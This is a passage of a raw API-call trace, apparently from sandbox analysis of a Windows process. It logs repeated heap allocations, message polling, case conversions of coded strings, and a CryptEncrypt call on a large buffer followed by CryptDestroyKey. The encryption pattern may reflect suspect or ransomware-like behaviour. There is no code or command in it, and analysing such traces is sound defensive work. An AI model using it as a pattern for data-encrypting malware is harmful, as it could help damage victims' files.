RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0161.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.810] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.811] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0161.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.823] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea0020*, pdwDataLen=0x8bef68*=0xdfd0d, dwBufLen=0xdfd10 | out: pbData=0x3ea0020*, pdwDataLen=0x8bef68*=0xdfd10) returned 1 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0161.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0161.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.855] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.855] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.856] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.856] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.857] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.857] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.858] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.858] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.931] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.931] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.932] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.997] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0161.998] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.998] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0161.998] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.998] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.998] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.998] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.998] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.999] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.999] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.999] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0162.000] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0162.000] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0162.000] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.000] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0162.000] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.000] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.000] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0162.001] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.001] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.001] RtlAllocateHeap 